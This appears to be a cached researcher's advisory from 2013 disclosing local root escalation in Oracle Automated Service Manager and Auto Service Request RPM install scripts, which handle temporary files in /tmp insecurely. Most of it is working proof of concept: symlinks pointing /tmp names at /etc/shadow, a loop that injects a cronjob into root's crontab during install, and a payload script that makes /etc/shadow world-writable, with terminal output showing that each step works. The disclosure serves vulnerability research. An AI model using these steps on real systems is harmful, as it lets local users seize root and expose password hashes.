This is Google's cache of http://vapid.dhs.org/research/Oracle_ASR_4.3.1.txt. It is a snapshot of the page as it appeared on Apr 19, 2013 23:26:15 GMT. The current page could have changed in the meantime. Learn more
Tip: To quickly find your search term on this page, press Ctrl+F or ⌘-F (Mac) and use the find bar.

Text-only version
 
Sun Automated Service Manager 1.3 local root during install


SUNWsasm-1.3.1-20110815093723

https://updates.oracle.com/Orion/Services/download?type=readme&aru=15864534

From the README: 	
"Oracle Automated Service Manager 1.3.1 

Oracle Automated Service Manager is the service management container for Auto Service Request and Secure File Transport.  It provides platform services (such as logging, data transport and persistence) to business services that are deployed to it."

Possible issues with files in /tmp.  



root@dev-unix-sec01:~/test# strings SUNWswasr-4.3.1-20130117131218.rpm |grep tmp
##Read the contents of crontab into a tmp file
/usr/bin/crontab -l > /tmp/crontab_edit
echo "0" > /tmp/tmpVariable
grep "/opt/SUNWswasr/bin/update_rules.sh" /tmp/crontab_edit |
           echo "1" > /tmp/tmpVariable
grep "0" /tmp/tmpVariable >  /dev/null
        echo >> /tmp/crontab_edit
        echo "##Cronjob entry for ASR Auto Rules Update" >> /tmp/crontab_edit
        echo "$min $hour * * * /opt/SUNWswasr/bin/update_rules.sh" >> /tmp/crontab_edit
ASR_STAT_REP=`/bin/grep -c 'bin/asr report' /tmp/crontab_edit`
    sed "/asr report/d" /tmp/crontab_edit > /tmp/asrtab1.???
    mv /tmp/asrtab1.??? /tmp/crontab_edit
    sed "/ASR Status Report/d" /tmp/crontab_edit > /tmp/asrtab1.???
    mv /tmp/asrtab1.??? /tmp/crontab_edit
ASR_HEARTBEAT=`/bin/grep -c 'bin/asr heartbeat' /tmp/crontab_edit`
    sed "/asr heartbeat/d" /tmp/crontab_edit > /tmp/asrtab1.???
    mv /tmp/asrtab1.??? /tmp/crontab_edit
    sed "/ASR Heartbeat/d" /tmp/crontab_edit > /tmp/asrtab1.???
    mv /tmp/asrtab1.??? /tmp/crontab_edit
/usr/bin/crontab /tmp/crontab_edit
## Finally remove the tmp file
rm -f /tmp/tmpVariable
rm -f /tmp/crontab_edit
		tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%SOURCE'`
/usr/bin/crontab -l > /tmp/asrtab.??
UPDATE_RULES=`/bin/grep -c 'bin/update_rules.sh' /tmp/asrtab.??`
    sed "/update_rules.sh/d" /tmp/asrtab.?? > /tmp/asrtab.???
    mv /tmp/asrtab.??? /tmp/asrtab.??
    sed "/ASR Auto Rules/d" /tmp/asrtab.?? > /tmp/asrtab.???
    mv /tmp/asrtab.??? /tmp/asrtab.??
ASR_STAT_HB=`/bin/grep -c 'bin/asr' /tmp/asrtab.??`
    sed "/asr report/d" /tmp/asrtab.?? > /tmp/asrtab.???
    mv /tmp/asrtab.??? /tmp/asrtab.??
    sed "/ASR Status Report/d" /tmp/asrtab.?? > /tmp/asrtab.???
    mv /tmp/asrtab.??? /tmp/asrtab.??
    sed "/asr heartbeat/d" /tmp/asrtab.?? > /tmp/asrtab.???
    mv /tmp/asrtab.??? /tmp/asrtab.??
    sed "/ASR Heartbeat/d" /tmp/asrtab.?? > /tmp/asrtab.???
    mv /tmp/asrtab.??? /tmp/asrtab.??
/usr/bin/crontab /tmp/asrtab.??
rm /tmp/asrtab.??
]!tmpD
root@dev-unix-sec01:~/test# 


file overwriting vulnerability

  ln -s /etc/shadow /tmp/mytab-tmp.??
  ln -s /etc/shadow /tmp/mytab.??


[root@dev-oracle-os02 ~]# rpm -Uvh SUNWsasm-1.3.1-20110815093723.rpm 
Preparing...                ########################################### [100%]


Copyright 2008,2011 Oracle and/or its affiliates. All rights reserved.

License and Terms of Use for this software are described at https://support.oracle.com/  (see Terms o
f Use)

   1:SUNWsasm               ########################################### [100%]

Authentication service cannot retrieve authentication info
You (root) are not allowed to access to (/usr/bin/crontab) because of pam configuration.

Authentication service cannot retrieve authentication info
You (root) are not allowed to access to (/usr/bin/crontab) because of pam configuration.
[root@dev-oracle-os02 ~]# cat /etc/shadow
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1


Inject a cronjob and get root:

Malicious user does:


[itoc@dev-oracle-os02 ~]$  while (true) ;do echo "* * * * * /tmp/rootme" > /tmp/mytab.??; done




[root@dev-oracle-os02 ~]# rpm -Uvh SUNWsasm-1.3.1-20110815093723.rpm 
Preparing...                ########################################### [100%]


Copyright 2008,2011 Oracle and/or its affiliates. All rights reserved.

License and Terms of Use for this software are described at https://support.oracle.com/  (see Terms o
f Use)

   1:SUNWsasm               ########################################### [100%]
[root@dev-oracle-os02 ~]# crontab -l
* * * * * /tmp/rootme
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1



/tmp/rootme is:


#!/bin/sh

chmod 666 /etc/shadow


after a minute:


[root@dev-oracle-os02 ~]# ls -l /etc/shadow
-rw-rw-rw- 1 root root 744 Jan 30 21:02 /etc/shadow
[root@dev-oracle-os02 ~]# 


SUNWswasr RPM post install /tmp race condition:

From the documentation:

"Auto Service Request (ASR) is a secure, scalable, customer-installable software feature of warranty and Oracle Support Services that provides auto-case generation when common hardware component faults occur. ASR is designed to enable faster problem resolution by eliminating the need to initiate contact with Oracle Support Services for common hardware component failures, reducing both the number of phone calls needed and overall phone time required. ASR also simplifies support operations by using electronic diagnostic data. Easily installed and deployed, ASR is completely controlled by you, the customer, to ensure security. ASR is applicable only for component faults. Not all component failures are covered, though the most common components (such as disk, fan, and power supplies) are covered."


The post-install script for SUNWswasr RPM handles files in /tmp insecurely. 

I suspect a race condition exists where these two files can be used to either clobber root owned files or inject malicious cronjobs into roots cron:

/tmp/tmpVariable
/tmp/crontab_edit


[root@dev-oracle-os02 ~]# rpm -Uvh SUNWswasr-4.3.1-20130117131218.rpm 
Preparing...                ########################################### [100%]


Copyright [2008,2012], Oracle and/or its affiliates. All rights reserved.

License and Terms of Use for this software are described at https://support.oracle.com/ (see Legal Notices and Terms of Use).


   1:SUNWswasr              ########################################### [100%]
Directory /var/opt/SUNWsasm/configuration/caseinfo created.
Directory /var/opt/SUNWsasm/configuration/supportfile created.
ASR Manager Auto Update functionality has been enabled by default. Please ensure that ASR manager is registered with ASR backend to get the software updates.
Installation of SUNWswasr was successful.



[C] -rw-r--r-- 1 root root 0  Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[U] -rw-r--r-- 1 root root 100  Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[C] -rw-r--r-- 1 root root 0  Thu Jan 31 14:30:12 2013 /tmp/tmpVariable
[U] -rw-r--r-- 1 root root 2  Thu Jan 31 14:30:12 2013 /tmp/tmpVariable
[U] -rw-r--r-- 1 root root 101  Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[U] -rw-r--r-- 1 root root 143  Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[U] -rw-r--r-- 1 root root 188  Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[D] F /tmp/tmpVariable
[D] F /tmp/crontab_edit

I was able to inject my own cronjob in as root with the following simple PoC:

$ while (true) ;do echo "* * * * * /tmp/rootme" >> /tmp/crontab_edit; done

[root@dev-oracle-os02 ~]# crontab -l
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1


* * * * * /tmp/rootme <--- prepended and contains our malicious shell/binary.

##Cronjob entry for ASR Auto Rules Update
7 3 * * * /opt/SUNWswasr/bin/update_rules.sh

The uninstall script is just as sloppy:


[C] F /tmp/asrtab.??
[U] F /tmp/asrtab.??
[C] F /tmp/asrtab.???
[U] F /tmp/asrtab.???
[C] F /tmp/asrtab.???
[U] F /tmp/asrtab.???
[D] F /tmp/asrtab.??


did they mean to use $$ for process Pid?